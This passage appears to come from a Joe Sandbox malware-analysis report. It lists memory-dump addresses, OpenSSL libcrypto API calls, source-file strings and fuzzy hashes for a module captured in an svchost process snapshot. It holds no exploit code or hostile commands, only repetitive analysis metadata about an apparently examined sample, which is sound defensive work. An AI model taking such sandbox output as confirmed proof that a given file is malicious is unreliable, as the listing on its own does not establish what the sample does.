                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\statem\extensions_cust.c
                                                                                              • API String ID: 3931833713-1564674317
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB44B13A,?,00007FFBAB44A99E), ref: 00007FFBAB46EBE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\uint_set.c
                                                                                              • API String ID: 2581946324-544055092
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB468BFF,?,?,00000004,?,?,00000004,00007FFBAB467831,?,?,?,?,?,?,00007FFBAB44F81E), ref: 00007FFBAB46A96F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: ssl\quic\quic_txpim.c
                                                                                              • API String ID: 1208671065-1264249673
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(00000000,00007FFBAB469F3B,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB46AAFC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_txpim.c
                                                                                              • API String ID: 3931833713-1264249673
                                                                                              APIs
                                                                                              • CRYPTO_memdup.LIBCRYPTO-3-X64(?,00007FFBAB44F46F,00000080,00007FFBAB450C3B,?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB4681CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_memdup
                                                                                              • String ID: ssl\quic\quic_txp.c
                                                                                              • API String ID: 560317026-3700743932
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45BB2D,?,00007FFBAB44B9F5), ref: 00007FFBAB45C14B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\quic_record_rx.c
                                                                                              • API String ID: 2581946324-3047069087
                                                                                              • Opcode ID: 41632703163fc184e1f730a83c7857f976f6e126df1b16ed371dbc01d2122129
                                                                                              • Instruction ID: a1c5d3b14a5f19e254bebd0405c691be52979fd30b0d551c986c2a2a7007c589
                                                                                              • Opcode Fuzzy Hash: 41632703163fc184e1f730a83c7857f976f6e126df1b16ed371dbc01d2122129
                                                                                              • Instruction Fuzzy Hash: D21100A2A0AF4181EE568B29D58063C63A5FB14FC8B24D535DE5C4B765EF3AD892C700
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB447C34,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB446BFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_malloc
                                                                                              • String ID: ssl\quic\json_enc.c
                                                                                              • API String ID: 1457121658-3790216822
                                                                                              • Opcode ID: 520227716b19b7dedfebe6dff8fe468833264c619a161b17cb4a50cfbe25309b
                                                                                              • Instruction ID: e1743a65d8c585d0017632561b4d33f5ef608408f1ffb6fb255e8843d2c5bef8
                                                                                              • Opcode Fuzzy Hash: 520227716b19b7dedfebe6dff8fe468833264c619a161b17cb4a50cfbe25309b
                                                                                              • Instruction Fuzzy Hash: 3601C863D197C086E351CF28E44036D77A0EB68B8CF14E225EA8C03266EE76D5D2C300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: ssl\quic\quic_engine.c
                                                                                              • API String ID: 1208671065-2291346005
                                                                                              • Opcode ID: 648922d4ab1a19cc7422fba9d9f8158589d3270c5c315cc5acd99e9f39ede53f
                                                                                              • Instruction ID: dba02775f54882a8cf5299c5e4e2dff32f208d1c679dc78223ba056994f97a95
                                                                                              • Opcode Fuzzy Hash: 648922d4ab1a19cc7422fba9d9f8158589d3270c5c315cc5acd99e9f39ede53f
                                                                                              • Instruction Fuzzy Hash: 55015EB2706F0692DB518F26E58155C73B4FB48B84B448136DF6C07B65EF38D5A4C740
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00007FFBAB468693,?,?,?,?,?,00000000,?,00007FFBAB467B71), ref: 00007FFBAB4688A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_txp.c
                                                                                              • API String ID: 3931833713-3700743932
                                                                                              • Opcode ID: 849aa596da2d9341a8a3c9e018e8c8689d0f91284e5937e868cf13a724cc43ee
                                                                                              • Instruction ID: 2df4fc2490f2acbe50d5a1e8bc0f31abe325ceb078873319b6eb726df6ce5e41
                                                                                              • Opcode Fuzzy Hash: 849aa596da2d9341a8a3c9e018e8c8689d0f91284e5937e868cf13a724cc43ee
                                                                                              • Instruction Fuzzy Hash: EFF0A4E2F2674183FF558721E5413682795EB54BC4F485436DE1C17795EF3CE5A28340
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: ssl\quic\quic_record_tx.c
                                                                                              • API String ID: 1208671065-2432027203
                                                                                              • Opcode ID: 48fc964fdf2c482615722f575e498f88e6913eb733bb01eb8e9e0a0df0d1b7b3
                                                                                              • Instruction ID: be613c0e56327eb716bf3e855b916a2dbda64149b8b54ff86d64a6cd4f62876f
                                                                                              • Opcode Fuzzy Hash: 48fc964fdf2c482615722f575e498f88e6913eb733bb01eb8e9e0a0df0d1b7b3
                                                                                              • Instruction Fuzzy Hash: 15014BB2605B4082DB15CB61E4912B833A8F7C8F54F198530DF5C83360CF38C991C250
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: crypto\packet.c
                                                                                              • API String ID: 1208671065-224687097
                                                                                              • Opcode ID: 8f41ab5865570030e3ac35ecdd65f32c6f2111179410054ca95cff8d0d691fc0
                                                                                              • Instruction ID: 3069940e240e30ab6d21028399bba9d0b06e689e1ca1940253cc8688846445bb
                                                                                              • Opcode Fuzzy Hash: 8f41ab5865570030e3ac35ecdd65f32c6f2111179410054ca95cff8d0d691fc0
                                                                                              • Instruction Fuzzy Hash: 28F0BEB2E07B0181EB158B69E48536822A0EB08B58F648034DE1C473A1EF3ED8E2C380
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB46E9BD,?,00007FFBAB46366B,?,?,00000000,?,00007FFBAB45A1A0,00000000,?,?,00007FFBAB459D9A,?,?), ref: 00007FFBAB46E6F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_malloc
                                                                                              • String ID: ssl\quic\uint_set.c
                                                                                              • API String ID: 1457121658-544055092
                                                                                              • Opcode ID: 1028996d009d5b2bba73af1a1b7a81eba610b63073fd91789b5daefa09d3f7b8
                                                                                              • Instruction ID: ff8bd2f8c8e72d1e1508724a757cce3b8ed87cf1e03c8161ad5700de8f6c1f33
                                                                                              • Opcode Fuzzy Hash: 1028996d009d5b2bba73af1a1b7a81eba610b63073fd91789b5daefa09d3f7b8
                                                                                              • Instruction Fuzzy Hash: AEF0EC62F65B4181EA468B21F18015C7750EFDCBC0F499131EE6C03755EE7CD9D48700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\t1_lib.c
                                                                                              • API String ID: 2581946324-1168734446
                                                                                              • Opcode ID: b91348d09161cf71eaa999de320089278ad6071c5f35364df30b264030731374
                                                                                              • Instruction ID: f6b8ee6e500e18ff7e540b73b2896ac1a65ebf2b0e01a331d38019dd19f5ea7f
                                                                                              • Opcode Fuzzy Hash: b91348d09161cf71eaa999de320089278ad6071c5f35364df30b264030731374
                                                                                              • Instruction Fuzzy Hash: CFE06DE6F4F61385FE66D67AC4952781250AF49B88F188431DC2E876A3ED1DE4428701
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\statem\extensions.c
                                                                                              • API String ID: 2581946324-3728926295
                                                                                              • Opcode ID: 324a5f64d52da2c0b12b9a938cf8d8a58a21c8a3752ad9fbbb0e33a6079b6bfe
                                                                                              • Instruction ID: f2671e41f1a6f45fe5256f671a86aef2270a3b540516ea581059e4982bcfd18d
                                                                                              • Opcode Fuzzy Hash: 324a5f64d52da2c0b12b9a938cf8d8a58a21c8a3752ad9fbbb0e33a6079b6bfe
                                                                                              • Instruction Fuzzy Hash: 5EE046E2A0738182FB529B28D0893A82254EB05B48F585038DE1C4E3A2DF7E81CAC711
                                                                                              APIs
                                                                                              • CRYPTO_clear_free.LIBCRYPTO-3-X64(?,00007FFBAB4178B4,00000000,00007FFBAB414AFF), ref: 00007FFBAB4162ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_free
                                                                                              • String ID: ssl\s3_enc.c
                                                                                              • API String ID: 2011826501-1240879137
                                                                                              • Opcode ID: 59a72ef481f06162f10a4088b1b897ac9434d0cd0cee74076ab6dac90c74b3f1
                                                                                              • Instruction ID: 28220a042a30aa795dfe386cd6928212e62495581ffb3155ee44532c00c6855c
                                                                                              • Opcode Fuzzy Hash: 59a72ef481f06162f10a4088b1b897ac9434d0cd0cee74076ab6dac90c74b3f1
                                                                                              • Instruction Fuzzy Hash: 79E01DA16D6583C5D791D775D8897EC13A4E708F84F144531DD5C87372DE28D1568350
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB45B2E0: OSSL_ERR_STATE_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45B323
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB455177), ref: 00007FFBAB45ABAB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: E_freeO_free
                                                                                              • String ID: ssl\quic\quic_port.c
                                                                                              • API String ID: 1398637539-1976217255
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\quic_engine.c
                                                                                              • API String ID: 2581946324-2291346005
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_read_lockD_unlock
                                                                                              • String ID:
                                                                                              • API String ID: 102331797-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_run_once
